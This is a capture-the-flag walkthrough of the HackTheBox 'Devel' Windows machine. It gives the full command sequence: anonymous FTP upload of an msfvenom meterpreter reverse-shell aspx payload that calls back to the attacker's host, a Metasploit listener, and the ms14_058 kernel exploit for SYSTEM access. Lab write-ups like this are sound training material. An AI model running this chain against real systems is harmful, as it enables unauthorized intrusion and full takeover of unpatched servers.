Devel HackTheBox WalkThrough

This is Devel HackTheBox Walkthrough. In this writeup I have demonstrated step-by-step procedure how I rooted Devel HTB box. Before starting let us know something about this box. It is a windows box with IP address 10.10.10.5 and difficulty easy assigned by it’s maker. There are two ways to solve this box either go manually or use metasploit. I used the later one.

As always, connect your PC with VPN and make sure your connectivity by pinging the IP 10.10.10.5. If failed to connect make sure Devel Box is running over the lab. If all goes correct then it is time to start hacking.

I started by scanning the box. Scanning give us an idea how we have to proceed further. Like, it helps in banner grabbing the services running over different ports and sometimes it helps in vulnerability scanning also. Nmap (port scanner) gave the following result:-

Scanning

$ nmap -sC -sV -p- -T4 -oN devel_full_scan 10.10.10.5

Nmap revealed that port 21 and 80 are open. Microsoft ftp server is running over port 21 and Microsoft IIS webserver is running over port 80. Nmap script ftp-anon discovered that anonymous login is allowed on ftp. So as usual, tried to login with the credential anonymous : anonymous.

FTP Anonymous Login

$ ftp 10.10.10.5

~anonymous

~anonymous

ftp > ls

Once logged in ftp server anonymously tried to list the content of the ftp folder and found files iisstart.htm & welcome.png inside it. Guessed these may be webserver’s files, which is running over port 80. Ongoing to URL http://10.10.10.5/iisstart.htm  and http://10.10.10.5/welcome.png it is confirmed that we have access to all the files of this folder. Tried to upload a simple txt file through ftp and successfully uploaded it and uploaded file can be accessed at url http://10.10.10.5/myfile.txt . Then tried to upload php webshell shell.php. It uploaded successfully but if we try to access, the shell at URL http://10.10.10.5/shell.php where it is supposed to present but, it gives 404 error.

This error may be due to php is not installed on the webserver. Since, it is IIS server so it generally host asp or apsx file. Tried to upload an aspx file and the uploaded file can be easily accessed directly at the url http://10.10.10.5/aspxfile.aspx. So here, we have confirmed that we can upload an aspx file and can access it. So made an aspx reverse shell using msfvenom and uploaded it on ftp server. You can get a list of reverse shell cheat sheet here.

Create Reverse Shell

$ msfvenom -p windows/meterpreter_reverse_tcp LHOST=10.10.14.10 LPORT=4321 -f aspx > reverse.aspx

Note: If you are getting error using non-staged payload windows/meterpreter_reverse_tcp you can use staged payload windows/meterpreter/reverse_tcp in your reverse.aspx shell. But make sure to set the same payload in the exploit/multi/handler listener.

Upload Shell to FTP

ftp> put reverse.aspx

Once we have uploaded our reverse shell reverse.aspx to the webserver our next step should be to start our listener on msfconsole and set the payload. Therefore, started exploit/multi/handler on msfconsole and set the payload to it in one window. And executed the URL http://10.10.10.5/reverse.aspx in another window. You can also open the URL in the browser to access it.

Start Listener

msf5 > use exploit/multi/handler

msf5 exploit(multi/handler) > set payload windows/meterpreter_reverse_tcp

msf5 exploit(multi/handler) > set LHOST 10.10.14.10

msf5 exploit(multi/handler) > set LPORT 4321

msf5 exploit(multi/handler) > exploit

Open URL

$ curl http://10.10.10.5/reverse.apsx

We can clearly see that we got a meterpreter shell. Ran some basic meterpreter commands.

meterpreter > sysinfo

meterpreter > getuid

Meterpreter command getuid returns that current user is IIS APPPOOL\Web, which means we have to escalate the privilege to admin to get root flag.

Privilege Escalation

Finding PrivEsc Vector

To find privilege escalation vector used post/multi/recon/local_exploit_suggester. This post exploitation module will gather all the Kernel Exploit to which the given machine is vulnerable to. To use this exploit do the following:

meterpreter > CTRL + Z # to background the meterpreter session

msf5 exploit(multi/handler) > search suggester

msf5 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester

msf5 post(multi/recon/local_exploit_suggester) > set SESSION 1

msf5 post(multi/recon/local_exploit_suggester) > exploit

This will gather the entire kernel exploit whose patch is not installed in the devel computer.

local_exploit_suggester enlist many number of local privilege escalation exploit. So here, our Privilege Escalation Vector can be a Kernel Exploit. Tried to use each module one by one and windows/local/ms14_058_track_popup_menu module was the right one which escalate the privilege to the administrator.

msf5 post(multi/recon/local_exploit_suggester) > use windows/local/ms14_058_track_popup_menu

msf5 exploit(windows/local/ms14_058_track_popup_menu) > set LHOST 10.10.14.10

msf5 exploit(windows/local/ms14_058_track_popup_menu) > set SESSION 1

msf5 exploit(windows/local/ms14_058_track_popup_menu) > exploit

meterpreter > getuid

We are NT AUTHORITY\SYSTEM now, which is the highest privilege in windows OS, even higher then Admin account. It is time to grab the flags. But let’s upgrade our shell to cmd prompt so that we can run more windows command.

Upgrading the Shell

$ meterpreter > shell

Capture User Flag

$ type \Users\babis\Desktop\user.txt.txt

Capture Root Flag

$type \Users\Administrator\Desktop\root.txt.txt

This was how I rooted Devel HackTheBox. Thanks for reading the walkthrough. Hope you guys have learnt some new things from this box writeup. Share your experience within the comment section. For any problem and suggestion related to walkthrough, feel free to write us at [email protected].

Next upcoming retired box walkthrough is Beep.

For other walkthroughs on HackTheBox, machine visit https://ethicalhacs.com